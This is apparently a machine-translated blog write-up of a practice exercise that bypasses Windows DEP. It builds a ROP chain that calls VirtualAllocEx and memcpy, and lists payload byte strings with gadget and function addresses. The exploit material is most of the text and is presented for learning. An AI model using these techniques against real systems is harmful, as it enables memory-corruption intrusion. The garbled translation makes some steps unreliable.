RET2LIBC Exercises (3)--VIRTUALALLOC

National Day holiday did not have to do a few pwn problem practiced hand, and so there is time to post the analysis of the PWN problem.

Bypassing DEP using the VirtualAlloc method is much the same as the previous method, except that VirtualAlloc opens up a new executable memory space, and then copying the shellcode is a little trickier than modifying the memory properties.

VirtualAlloc function Description:

　　

Lpaddress: The starting address of the application memory, the experiment selected 0x00030000

Dwsize: The requested memory size, experiment selected 0XFF, according to the size of Shellcode determined

Flallocationtype: Type of application memory, fixed 0x00001000

Flprotect: Application memory properties, readable writable executable, fixed 0x00000040

First cover the EIP with \x90

　　

Now the EBP and EIP are covered, so first fix EBP, with push esp; Pop EBP

"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\x92\x90\x90\x90""\x93\x90\x90\x90""\x94\x90\x90\x90""\x95\x90\x90\x90""\x96\x90\x90\x90""\x97\x90\x90\x90"

Keep going

At this point, find the entry point of the VirtualAlloc function esp=ebp+8

　　

After the EBP has been determined, the position of the four parameters of the VirtualAlloc is OK, and the four parameters are the values that can be determined, so the stack can now be arranged like this

　　

"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\xf4\x9a\x80\x7c" //VirtualAllocEx"\x93\x90\x90\x90""\xff\xff\xff\xff" //-1"\x00\x00\x03\x00" //Start Address 0x00300000"\xff\x00\x00\x00" //space to apply 0xFF"\x00\x10\x00\x00" //Fixed parameter 0x1000"\x40\x00\x00\x00" //0x40 Readable writable executable

Direct the EIP to the entry point of the VirtualAllocEx function and see if the stack sees the parameter placement is no problem

Next executes the VirtualAllocEx function, sees eax=0x00003000, indicates the function execution succeeds, but after executes VirtualAllocEx the program control right needs the pop ebp; RETN 10 to get it.

　　

Stack condition after RETN 10 is executed

　　

See that EBP is destroyed again, regardless, check the memcpy function to determine if you need to fix ebp,void *memcpy (void *dest, const void *SRC, size_t n); From the beginning of the memory address referred to by the source src, copy n bytes to the starting position of the memory address referred to by the target dest, so it is only necessary to dynamically determine the address of the SRC, see also used EBP, so we have to amend the EBP

　　

is not the next instruction to push ESP directly; Pop ebp; You can do it? After my own debugging found this way in the process of the subsequent walk of the stack will be a problem, will lose control of the program, because the memcpy parameter filling problem, if directly push the source copy address (here can choose ESP), in doing some operations is not feasible, so the best way is to push Esp jmp eax; This can not lose control of the program, then you can find a pop eax; RETN instructions, first save a EAX value, the value of this eax, is the starting address of memcpy, and then in the correction EBP

　　

"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\xf4\x9a\x80\x7c" //VirtualAllocEx"\x93\x90\x90\x90""\xff\xff\xff\xff" //-1"\x00\x00\x03\x00" //Start Address 0x00300000"\xff\x00\x00\x00" //space to apply 0xFF"\x00\x10\x00\x00" //Fixed parameter 0x1000"\x40\x00\x00\x00" //0x40 readable writable executable"\x91\x90\x90\x90""\xdd\x6f\xfa\x77" //Pop Retn"\x93\x90\x90\x90""\x94\x90\x90\x90""\x95\x90\x90\x90""\x96\x90\x90\x90""\x97\x90\x90\x90" //eax"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\x91\x90\x90\x90""\x92\x90\x90\x90""\x93\x90\x90\x90""\x94\x90\x90\x90""\x95\x90\x90\x90"

Stack condition after execution

　　

OK, at this time to see the value of EBP, and mencpy required parameters, the red box range is memcpy three parameters, the first parameter and the third parameter are fixed, the second parameter is the starting address of the copy, here directly written into the value of ESP, so also need pop; Pop Push ESP; Pop;pop; retn directive, it is obvious that this command is not found, so choose a pop; RETN, this allows the ESP to come to the 0x0012ff00 location, and then the next step is to push ESP directly; In jmp eax, the eax point in the book is the pop pop Retn, where the starting address of the memcpy is placed in the 4 bytes below the first parameter, allowing the program to bounce the starting address of the memcpy into the EIP, Write the article when I think of the value of the EAX directly put memcpy start address should also be able, tested really no problem

　　

"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\xf4\x9a\x80\x7c" //VirtualAllocEx"\x93\x90\x90\x90""\xff\xff\xff\xff" //-1"\x00\x00\x03\x00" //Start Address 0x00300000"\xff\x00\x00\x00" //space to apply 0xFF"\x00\x10\x00\x00" //Fixed parameter 0x1000"\x40\x00\x00\x00" //0x40 readable writable executable"\x91\x90\x90\x90""\xdd\x6f\xfa\x77" //Pop Retn"\x93\x90\x90\x90""\x94\x90\x90\x90""\x95\x90\x90\x90""\x96\x90\x90\x90""\x9e\x37\xfa\x77" //eax"\xe5\xe0\x72\x7d" //push esp; pop ebp; RETN 4"\xd2\x97\xf8\x77" //pop ebx; Retn"\x92\x90\x90\x90""\x00\x00\x03\x00" //0x00030000"\xc6\xc6\xeb\x77""\xff\x00\x00\x00""\xb8\x1d\x92\x7c" //memcpy

Tips: This experiment is still very good, the structure of the ROP chain is a bit complex and skill, need their own step by step manual to debug, as for the book finally put some padding characters to ensure the normal execution of Shellcode, this machine and different feeling, because the ROP chain inside the address is not the same, Cause my machine to debug without padding characters

　　

　　

RET2LIBC Exercises (3)--VIRTUALALLOC